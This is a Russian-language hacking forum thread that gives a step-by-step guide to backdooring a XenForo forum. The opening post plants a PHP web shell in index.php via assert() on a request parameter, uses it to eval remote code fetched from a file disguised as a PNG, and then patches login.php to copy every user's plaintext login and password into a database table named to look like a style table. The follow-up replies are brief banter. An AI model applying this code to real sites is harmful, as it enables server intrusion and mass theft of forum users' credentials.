PDA

Просмотр полной версии : Избавляемся от Хеширования [Xenforo]


pw0ned
25.01.2016, 20:03
Используем "WSO Web Shel"

Отправляемся к файлу index.php , и дописываем вредоносный код:


Code:
if (isset($_REQUEST['l']))
assert(stripslashes($_REQUEST[l]));

Вызываем скрипт и получаем доступ к RemoteShell:


Code:
http://www.ru/index.php?l=eval(file_get_contents(%27http://www.ru/screen.png%27))#

Отсеиваем логин и пасс из файлов с ФТП , создаем базу данных


Code:
create table xf_style_property_css (
ID int(20) AUTO_INCREMENT,
CSSName varchar(50) NOT NULL,
CSSValue varchar(50) NOT NULL,
PRIMARY KEY (ID)
);

Находим в файле login.php строки:

http://i.imgur.com/TBUUmhA.png

Дописываем код:


Code:
$DataBaseConnector = mysql_connect('localhost', 'Имя БД', 'Пароль от БД');
mysql_select_db('Имя БД');
mysql_query("SET NAMES 'utf8'");
$datalogxf = $data['login'];
$datapassxf = $data['password'];
mysql_query("INSERT INTO `xf_style_property_css` (`ID`, `CSSName`, `CSSValue`) VALUES ('', '$datalogxf', '$datapassxf') ", $DataBaseConnector);

После всех выше описанных функций , каждый авторизованный пользователь будет внесен в наш раздел с базой ( который создали выше ).

Выполняем команду получения списка: (Сейчас он пустой )


Code:
SELECT * FROM `xf_style_property_css`

pw0ned
31.08.2016, 00:53
Может можно перенести куда-то в статьи ?

@yarbabin (https://antichat.live/members/45288/)

BabaDook
31.08.2016, 01:24
Я просто подумал. Потом админ сделает show databases;

И....

faza02
31.08.2016, 02:10
не, на какой-то лютый ресерч не тянет

pw0ned
15.10.2016, 13:37
BabaDook said:
↑ (https://antichat.live/posts/3986269/)
Я просто подумал. Потом админ сделает show databases;
И....


И.... охренеет